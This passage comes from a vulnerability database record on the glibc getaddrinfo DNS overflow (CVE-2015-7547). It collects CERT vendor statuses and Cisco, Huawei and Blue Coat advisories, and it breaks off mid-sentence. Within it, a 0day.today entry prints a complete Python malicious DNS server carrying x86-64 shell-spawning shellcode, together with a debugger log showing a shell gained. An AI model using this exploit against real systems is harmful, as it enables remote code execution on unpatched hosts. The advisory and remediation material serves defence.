Unknown\n\nNotified: February 17, 2016 Updated: February 22, 2016 \n\n**Statement Date: February 19, 2016**\n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has provided the following list. A statement is available at the URL below.\n\nThe following products have been confirmed to be not vulnerable to the glibc issue reported as CVE-2015-7547: \n\n\n * \u200b\u200b\u200b\u200b\u200bJunos OS does not use glibc and is not affected by this issue. \nNote: Linux VM-based platforms (e.g. vSRX, vMX, etc.) 
include glibc, but do not make use of DNS client libraries during normal operation. \n\n * \u200b\u200bJunos Space \n\n * ScreenOS uses a different implementation of libc and is not affected by this issue. \n\n * QFabric Director \n\n * \u200bJUNOSe \n\n * CTP and CTPView \n\n * NSM server relies on underlying OS glibc library. Contact OS vendor \n\n * SBR Carrier running on RHEL relies on the glibc library shipped with the OS. Customers should contact the OS vendor to upgrade glibc.\n * SBR Carrier running on Solaris is not vulnerable as it does not use this library. \n\n * \u200bWX/WXC \n\n * Netscreen IDP\nOther products are still under investigation.\u200b\n\n### Vendor References\n\n * <http://forums.juniper.net/t5/Security-Incident-Response/glibc-getaddrinfo-stack-based-buffer-overflow-CVE-2015-7547/ba-p/288261>\n\n### Lynx Software Technologies Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### McAfee Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Microsoft Corporation Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### NEC Corporation Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### NLnet Labs Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### NetBSD Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 
\n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Nokia Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Nominum Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### OmniTI Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### OpenBSD Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### OpenDNS Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Oracle Corporation Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Peplink Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### PowerDNS Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Q1 Labs Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### 
Vendor References\n\n### QNX Software Systems Inc. Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### SUSE Linux Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### SafeNet Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Secure64 Software Corporation Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Slackware Linux Inc. Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### SmoothWall Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Snort Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Sony Corporation Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Sourcefire Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Symantec 
Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### TippingPoint Technologies Inc. Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Turbolinux Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Unisys Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### VMware Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Wind River Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Xilinx Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### ZyXEL Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### dnsmasq Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### gdnsd Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### 
Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### m0n0wall Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### openSUSE project Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\nView all 92 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 8.1 | E:POC/RL:TF/RC:C \nEnvironmental | 8.1 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html>\n * <https://sourceware.org/bugzilla/show_bug.cgi?id=18665>\n * <https://googleonlinesecurity.blogspot.com/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html>\n * <https://sourceware.org/glibc/wiki/Glibc%20Timeline>\n\n### Acknowledgements\n\nThis vulnerability was disclosed by Fermin J. Serna and Kevin Stadmeyer of Google and Florian Weimer and Carlos O\ud840\udd9donell of Red Hat. 
Google thanks: \"Neel Mehta, Thomas Garnier, Gynvael Coldwind, Michael Schaller, Tom Payne, Michael Haro, Damian Menscher, Matt Brown, Yunhong Gu, Florian Weimer, Carlos O\ud840\udd9donell and the rest of the glibc team for their help figuring out all details about this bug, exploitation, and patch development.\"\n\nThis document was written by Garret Wassermann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2015-7547](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-7547>) \n---|--- \n**Date Public:** | 2016-02-16 \n**Date First Published:** | 2016-02-17 \n**Date Last Updated: ** | 2016-03-14 14:25 UTC \n**Document Revision: ** | 52 \n", "modified": "2016-03-14T14:25:00", "published": "2016-02-17T00:00:00", "id": "VU:457759", "href": "https://www.kb.cert.org/vuls/id/457759", "type": "cert", "title": "glibc vulnerable to stack buffer overflow in DNS resolver", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisco": [{"lastseen": "2020-12-24T11:41:14", "bulletinFamily": "software", "cvelist": ["CVE-2015-7547"], "description": "A vulnerability in the libresolv library in GNC glibc could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition.\n\nThe vulnerability is due to insufficient validation of user-supplied input by the affected software when the getaddrinfo function is used while performing dual A/AAAA DNS queries. An attacker could exploit this vulnerability by sending a crafted DNS response to a targeted system. An exploit could trigger a stack-based buffer overflow condition that the attacker could leverage to execute arbitrary code or cause a DoS condition.\n\nOn February 16, 2016, an industry-wide, critical vulnerability in the GNU C library (glibc) was publicly disclosed.\n\nMultiple Cisco products incorporate a version of glibc that may be affected by the vulnerability. 
The vulnerability could allow an unauthenticated, remote attacker to trigger a buffer overflow condition that may result in a denial of service (DoS) condition or allow the attacker to execute arbitrary code on an affected device.\n\nCisco will release software updates that address this vulnerability.\n\nWorkarounds that address this vulnerability are not available.\n\nThis advisory is available at the following link:\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160218-glibc [\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160218-glibc\"]", "modified": "2017-02-13T18:20:55", "published": "2016-02-18T20:22:00", "id": "CISCO-SA-20160218-GLIBC", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160218-glibc", "type": "cisco", "title": "Vulnerability in GNU glibc Affecting Cisco Products: February 2016", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-02-05T03:09:49", "description": "Exploit for linux platform in category remote exploits", "edition": 2, "published": "2016-09-06T00:00:00", "type": "zdt", "title": "glibc - getaddrinfo Stack Based Buffer Overflow (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7547"], "modified": "2016-09-06T00:00:00", "id": "1337DAY-ID-24769", "href": "https://0day.today/exploit/description/24769", "sourceData": "/*\r\n \r\nadd by [email\u00a0protected] (jang kyoung chip)\r\n \r\nThis is a published vulnerability by google in the past.\r\nPlease refer to the link below.\r\n \r\nReference: \r\n- https://googleonlinesecurity.blogspot.kr/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html\r\n- https://github.com/fjserna/CVE-2015-7547\r\n- CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow \r\n \r\nWhen Google announced about this code(vulnerability), \r\nit was missing information on shellcode.\r\nSo, I tried to completed the shellcode.\r\nIn the future, I hope to help 
your study.\r\n \r\n \r\n(gdb) r\r\nStarting program: /home/haker/client1 \r\nGot object file from memory but can't read symbols: File truncated.\r\n[UDP] Total Data len recv 36\r\n[UDP] Total Data len recv 36\r\nudp send \r\nsendto 1\r\nTCP Connected with 127.0.0.1:60259\r\n[TCP] Total Data len recv 76\r\n[TCP] Request1 len recv 36\r\ndata1 = \u00ef\u00bf\u00bd\u00ef\u00bf\u00bd\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u0001\u0001\r\nquery = \u0003foo\u0003bar\u0006google\u0003com\u0001\u0001$(\u00ef\u00bf\u00bd\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u001c\u0001\r\n[TCP] Request2 len recv 36\r\nsendto 2\r\ndata1_reply\r\ndata2_reply\r\n[UDP] Total Data len recv 36\r\n[UDP] Total Data len recv 36\r\nudp send \r\nsendto 1\r\nTCP Connected with 127.0.0.1:60260\r\n[TCP] Total Data len recv 76\r\n[TCP] Request1 len recv 36\r\ndata1 = \u00ef\u00bf\u00bd\u00ef\u00bf\u00bd\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u0001\u0001\r\nquery = \u0003foo\u0003bar\u0006google\u0003com\u0001\u0001$\u00ef\u00bf\u00bd7\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u001c\u0001\r\n[TCP] Request2 len recv 36\r\nsendto 2\r\ndata1_reply\r\ndata2_reply\r\nprocess 6415 is executing new program: /bin/dash\r\n$ id\r\nuid=1000(haker) gid=1000(haker) groups=1000(haker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)\r\n$ \r\n \r\n*/\r\n \r\n \r\n \r\n \r\nimport socket\r\nimport time\r\nimport struct\r\nimport threading\r\n \r\nIP = '192.168.111.5' # Insert your ip for bind() here...\r\nANSWERS1 = 184\r\n \r\nterminate = False\r\nlast_reply = None\r\nreply_now = threading.Event()\r\n \r\n \r\ndef dw(x):\r\n return struct.pack('>H', x)\r\n \r\ndef dd(x):\r\n return struct.pack('>I', x)\r\n \r\ndef dl(x):\r\n return struct.pack('<Q', x)\r\n \r\ndef db(x):\r\n return chr(x)\r\n \r\ndef udp_thread():\r\n global terminate\r\n \r\n # Handle UDP requests\r\n sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n 
sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n sock_udp.bind((IP, 53))\r\n \r\n reply_counter = 0\r\n counter = -1\r\n \r\n answers = []\r\n \r\n while not terminate:\r\n data, addr = sock_udp.recvfrom(1024)\r\n print '[UDP] Total Data len recv ' + str(len(data))\r\n id_udp = struct.unpack('>H', data[0:2])[0]\r\n query_udp = data[12:]\r\n \r\n # Send truncated flag... so it retries over TCP\r\n data = dw(id_udp) # id\r\n data += dw(0x8380) # flags with truncated set\r\n data += dw(1) # questions\r\n data += dw(0) # answers\r\n data += dw(0) # authoritative\r\n data += dw(0) # additional\r\n data += query_udp # question\r\n data += '\\x00' * 2500 # Need a long DNS response to force malloc \r\n \r\n answers.append((data, addr))\r\n \r\n if len(answers) != 2:\r\n continue\r\n \r\n counter += 1\r\n \r\n if counter % 4 == 2:\r\n answers = answers[::-1]\r\n \r\n \r\n print 'udp send '\r\n time.sleep(0.01)\r\n sock_udp.sendto(*answers.pop(0))\r\n \r\n print 'sendto 1 '\r\n reply_now.wait()\r\n sock_udp.sendto(*answers.pop(0))\r\n print 'sendto 2 '\r\n \r\n sock_udp.close()\r\n \r\n \r\ndef tcp_thread():\r\n global terminate\r\n counter = -1\r\n \r\n #Open TCP socket\r\n sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n sock_tcp.bind((IP, 53))\r\n sock_tcp.listen(10)\r\n \r\n print 'a'\r\n \r\n while not terminate:\r\n conn, addr = sock_tcp.accept()\r\n counter += 1\r\n print 'TCP Connected with ' + addr[0] + ':' + str(addr[1])\r\n \r\n # Read entire packet\r\n data = conn.recv(1024)\r\n print '[TCP] Total Data len recv ' + str(len(data))\r\n \r\n reqlen1 = socket.ntohs(struct.unpack('H', data[0:2])[0])\r\n print '[TCP] Request1 len recv ' + str(reqlen1)\r\n data1 = data[2:2+reqlen1]\r\n \r\n print 'data1 = ' +data1\r\n \r\n id1 = struct.unpack('>H', data1[0:2])[0]\r\n query1 = data[12:]\r\n \r\n print 'query = ' + query1\r\n \r\n # Do we have an extra request?\r\n data2 = 
None\r\n if len(data) > 2+reqlen1:\r\n reqlen2 = socket.ntohs(struct.unpack('H', data[2+reqlen1:2+reqlen1+2])[0])\r\n print '[TCP] Request2 len recv ' + str(reqlen2)\r\n data2 = data[2+reqlen1+2:2+reqlen1+2+reqlen2]\r\n id2 = struct.unpack('>H', data2[0:2])[0]\r\n query2 = data2[12:]\r\n \r\n \r\n \r\n # Reply them on different packets\r\n data = ''\r\n data += dw(id1) # id\r\n data += dw(0x8180) # flags\r\n data += dw(1) # questions\r\n data += dw(ANSWERS1) # answers\r\n data += dw(0) # authoritative\r\n data += dw(0) # additional\r\n data += query1 # question\r\n \r\n \r\n \r\n for i in range(ANSWERS1):\r\n answer = dw(0xc00c) # name compressed\r\n answer += dw(1) # type A\r\n answer += dw(1) # class\r\n answer += dd(13) # ttl\r\n answer += dw(4) # data length\r\n answer += 'D' * 4 # data\r\n \r\n data += answer\r\n \r\n data1_reply = dw(len(data)) + data\r\n \r\n if data2:\r\n data = ''\r\n data += dw(id2)\r\n data += 'A' * (6)\r\n data += '\\x08\\xc5\\xff\\xff\\xff\\x7f\\x00\\x00'\r\n data += '\\x90' * (44)\r\n data += '\\x90' * (1955)\r\n data += '\\x48\\x31\\xff\\x57\\x57\\x5e\\x5a\\x48\\xbf\\x2f\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x48\\xc1\\xef\\x08\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x0f\\x05'\r\n data += '\\x90' * (100)\r\n data += '\\xc0\\xc4\\xff\\xff\\xff\\x7f\\x00\\x00'\r\n data += 'F' * (8)\r\n data += '\\xc0\\xc4\\xff\\xff\\xff\\x7f\\x00\\x00'\r\n data += 'G' * (134)\r\n data2_reply = dw(len(data)) + data\r\n else:\r\n data2_reply = None\r\n \r\n reply_now.set()\r\n time.sleep(0.01)\r\n conn.sendall(data1_reply)\r\n print 'data1_reply'\r\n time.sleep(0.01)\r\n if data2:\r\n conn.sendall(data2_reply)\r\n print 'data2_reply'\r\n \r\n reply_now.clear()\r\n \r\n sock_tcp.shutdown(socket.SHUT_RDWR)\r\n sock_tcp.close()\r\n \r\n \r\nif __name__ == \"__main__\":\r\n \r\n t = threading.Thread(target=udp_thread)\r\n t.daemon = True\r\n t.start()\r\n tcp_thread()\r\n terminate = True\n\n# 0day.today [2018-02-05] #", "cvss": {"score": 6.8, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24769"}, {"lastseen": "2018-01-01T05:06:57", "description": "Exploit for linux platform in category dos / poc", "edition": 1, "published": "2016-02-16T00:00:00", "type": "zdt", "title": "glibc - getaddrinfo Stack Based Buffer Overflow (1)", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7547"], "modified": "2016-02-16T00:00:00", "href": "https://0day.today/exploit/description/25827", "id": "1337DAY-ID-25827", "sourceData": "Sources: \r\nhttps://googleonlinesecurity.blogspot.sg/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html\r\nhttps://github.com/fjserna/CVE-2015-7547\r\n \r\nTechnical information:\r\n \r\nglibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query.\r\n \r\nLater on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated.\r\n \r\nUnder certain conditions a mismatch between the stack buffer and the new heap allocation will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow.\r\n \r\nThe vectors to trigger this buffer overflow are very common and can include ssh, sudo, and curl. We are confident that the exploitation vectors are diverse and widespread; we have not attempted to enumerate these vectors further.\r\n \r\nWe are providing this code as-is. You are responsible for protecting yourself,\r\nyour property and data, and others from any risks caused by this code. 
This\r\ncode may cause unexpected and undesirable behavior to occur on your machine.\r\nThis code may not detect the vulnerability on your system.\r\n \r\nNote that this POC consists of two components: server code and client code.\r\nThe server code triggers the vulnerability and therefore will crash the client\r\ncode. Note also that it is necessary to set the nameserver to point to the\r\nserver code, and doing so could cause other programs that call into the\r\ngetaddrinfo() function to crash while testing is underway. This POC code is\r\nprovided \"as is\" with no warranties, whether express or implied, including\r\nwithout limitation any warranties or merchantability, fitness for a particular\r\nuse and noninfringement. Google assumes no responsibility for your proper\r\ninstallation and use of the POC code.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/fjserna/CVE-2015-7547/archive/master.zip\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39454-1.zip\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/25827", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "huawei": [{"lastseen": "2016-09-05T13:35:30", "bulletinFamily": "software", "cvelist": ["CVE-2015-7547"], "edition": 1, "description": "Google security research team disclosed a buffer overflow vulnerability in GNU C library (glibc) (CVE-2015-7547) on February 16, 2016, remote attackers can exploit the vulnerability to execute arbitrary code on an affected device. (Vulnerability ID: HWPSIRT-2016-02018) \nThis vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2015-7547\u00a0\nHuawei has released software updates to fix these vulnerabilities. 
This advisory is available at the following link: \nhttp://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160304-01-glibc-en", "modified": "2016-05-10T00:00:00", "published": "2016-03-04T00:00:00", "id": "HUAWEI-SA-20160304-01-GLIBC-EN", "href": "http://www.huawei.com/en/psirt/security-advisories/2016/huawei-sa-20160304-01-glibc-en", "type": "huawei", "title": "Security Advisory - GNU Glibc Buffer Overflow Security Vulnerability", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-01T18:01:30", "bulletinFamily": "software", "cvelist": ["CVE-2015-7547"], "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "edition": 1, "modified": "2016-12-28T00:00:00", "published": "2016-03-04T00:00:00", "id": "HUAWEI-SA-20160304-01-GLIBC", "href": "https://www.huawei.com/en/psirt/security-advisories/2016/huawei-sa-20160304-01-glibc-en", "title": "Security Advisory - GNU Glibc Buffer Overflow Security Vulnerability", "type": "huawei", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "symantec": [{"lastseen": "2021-03-14T10:41:38", "bulletinFamily": "software", "cvelist": ["CVE-2015-7547"], "description": "### SUMMARY\n\n \n\n\nBlue Coat products using an affected version of the GNU C Library (glibc) are susceptible to a remote execution attack. 
A remote attacker can send a crafted DNS response to the glibc DNS resolver and cause the resolver to crash or execute arbitrary code.\n\n### AFFECTED PRODUCTS\n\n \n\n\nThe following products are vulnerable:\n\n**Advanced Secure Gateway (ASG)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 6.6 | Upgrade to 6.6.4.1. \n \n \n\n**Content Analysis System (CAS)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 1.3 | Upgrade to 1.3.6.1. \n \n \n\n**Malware Analysis Appliance (MAA)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 4.2 | Upgrade to 4.2.8. \n \n \n\n**Management Center (MC)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 1.6 and later | Not vulnerable, fixed in 1.6.1.1 \n1.5 | Upgrade to 1.5.3.1. \n \n \n\n**Norman Shark Industrial Control System Protection (ICSP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 5.3 | Upgrade to 5.3.6. \n \n \n\n**Norman Shark Network Protection (NNP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 5.3 | Upgrade to 5.3.6. \n \n \n\n**Norman Shark SCADA Protection (NSP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 5.3 | Upgrade to 5.3.6. \n \n \n\n**PacketShaper (PS) S-Series** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 11.6 and later | Not vulnerable, fixed in 11.6.1.1 \n11.5 | Upgrade to 11.5.3.1. \n11.2, 11.3, 11.4 | Upgrade to later release with fixes. \n \n \n\n**PolicyCenter (PC) S-Series** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 1.1 | Upgrade to 1.1.2.1. \n \n \n\n**Reporter** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 10.1 | Upgrade to 10.1.4.1. \n9.4, 9.5 | Not vulnerable \n \n \n\n**Security Analytics** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 7.2 | Not vulnerable, fixed in 7.2.1 \n7.1 | Upgrade to 7.1.11. 
\n7.0 | Upgrade to later release with fixes. \n6.6 | Upgrade to 6.6.12. \n \n \n\n**SSL Visibility** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 3.9 | Upgrade to 3.9.3.3. \n3.8.4FC | Upgrade to 3.8.4FC-55. \n3.8 | Upgrade to 3.8.6-14. \n \n \n\n**X-Series XOS** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 11.0 | Upgrade to 11.0.2. \n10.0 | Upgrade to 10.0.6. \n9.7 | Not vulnerable \n \n### ADDITIONAL PRODUCT INFORMATION\n\n \n\n\nBlue Coat products that use a native installation of glibc, but do not install or maintain that implementation are not vulnerable. However, the underlying platform that provides the glibc library may be vulnerable. Blue Coat urges our customers to update the versions of glibc that are natively installed for Client Connector, ProxyClient, and Reporter 9.x for Linux.\n\nThe following products are not vulnerable: \n**Android Mobile Agent \nAuthConnector \nBCAAA \nBlue Coat HSM Agent for the Luna SP \nCacheFlow \nClient Connector \nCloud Data Protection for Salesforce \nCloud Data Protection for Salesforce Analytics \nCloud Data Protection for ServiceNow \nCloud Data Protection for Oracle CRM On Demand \nCloud Data Protection for Oracle Field Service Cloud \nCloud Data Protection for Oracle Sales Cloud \nCloud Data Protection Integration Server \nCloud Data Protection Communication Server \nCloud Data Protection Policy Builder \nDirector \nGeneral Auth Connector Login Application \nIntelligenceCenter \nIntelligenceCenter Data Collector \nK9 \nMail Transfer Defense \nPacketShaper \nPolicyCenter \nProxyClient \nProxyAV \nProxyAV ConLog and ConLogXP \nProxySG \nUnified Agent**\n\nBlue Coat no longer provides vulnerability information for the following products:\n\n**DLP** \nPlease, contact Digital Guardian technical support regarding vulnerability information for DLP.\n\n### ISSUES\n\n \n\n\nThe stack-based buffer overflow exists in the glibc client DNS resolver implementation (libresolv) 
when invoked from the libnss_dns module. The buffer overflow occurs in the libnss_dns send_dg() and send_vc() functions when a userspace application resolves a DNS name by calling getaddrinfo() with the AF_UNSPEC parameter. The AF_UNSPEC parameter does not tell the resolver whether to resolve the DNS name to an IPv4 or IPv6 address, so the resolver sends both type A (IPv4) and AAAA (IPv6) DNS queries in parallel. A mismanagement of the buffers allocated for the queries may cause an oversized response of a DNS query to be written beyond the bounds of the query's buffer.\n\nA remote attacker can exploit this vulnerability by sending a crafted, oversized DNS response to the DNS resolver. The resolver will crash or execute arbitrary code with the access privileges of the application requesting the DNS name resolution. If the application runs with root privileges, the remote attacker will gain root access and have complete control of the target.\n\n**CVE-2015-7547** \n--- \n**Severity / CVSSv2** | High / 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n**References** | SecurityFocus: [BID 83265](<https://www.securityfocus.com/bid/83265>) / NVD: [CVE-2015-7547](<https://nvd.nist.gov/vuln/detail/CVE-2015-7547>) \n**Impact** | Denial of service, code execution \n**Description** | A stack-based buffer overflow in the client DNS resolver allows a remote attacker to send a crafted DNS response and cause an application crash or execute arbitrary code. \n \n### MITIGATION\n\n \n\n\nBlue Coat's ProxySG appliance can be used to protect against the glibc remote code execution attack. Customers using ProxySG as a reverse proxy can protect network hosts by blocking the oversized DNS responses that trigger the stack-based buffer overflow. DNS responses over TCP should be limited to 1024 bytes and DNS responses over UDP should be 